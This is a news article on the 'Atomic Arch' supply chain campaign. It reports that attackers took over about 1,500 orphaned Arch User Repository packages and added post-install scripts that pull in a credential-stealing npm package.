Around 1,500 AUR Packages Compromised with "Rootkit-Like" Malware

Researchers at Sonatype uncovered a massive supply chain attack against the Arch User Repository (AUR) to harvest credentials and exfiltrate user data by hijacking around 1,500 packages.

The attack, dubbed "Atomic Arch" by the researchers, is one of the largest attacks against the AUR of all time.

The AUR is a collection of unofficial packages made by the Arch Linux community. There's even a warning on the Arch wiki that packages have not been fully vetted and you use the packages at your own risk.

The campaign targeted packages that have been abandoned by their maintainers for one reason or another.

The attackers are abusing the process for community members to request ownership of orphaned packages.

In the Atomic Arch campaign, attackers appear to be exploiting this process to gain stewardship of trusted packages already used by the community. Attackers adopt orphaned AUR packages. The package keeps its existing name, history, and user trust, but control of its build instructions changes hands.

Cleverly, the attackers didn't modify the actual packages themselves, but instead modified the packages' build instructions, thus bypassing traditional methods of detecting malware.

Instead, they modify the packages' PKGBUILD to add a post-install script that installs a malicious npm package called atomic-lockfile.

The researchers found that the package was hiding its activity to make it harder to identify, which includes looking through your directories and making network connections, including specific references to SSH keys, browser cookie databases, and data stores for spells like Discord, Slack, and Telegram.

These indicators strongly suggest credential stealing and data exfiltration.

The method of compromise is quite sneaky since users will just assume a new update is available for a trusted package and install it without thinking. The attackers essentially hijack the trust built up over the years by package maintainers and bypass the need to convince users to install something new.

Attackers are not building trust from scratch. They're acquiring projects that have already earned it. That dramatically reduces the warning signs developers normally rely on when evaluating software.

2026 has seen a staggering number of supply chain attacks, normally attacking the CI/CD infrastructure of developers.

This attack leveraging a widely-used community repository highlights the risks involved in unofficial packages. Hopefully, Arch can harden the process for adopting orphaned packages to perhaps require more vetting.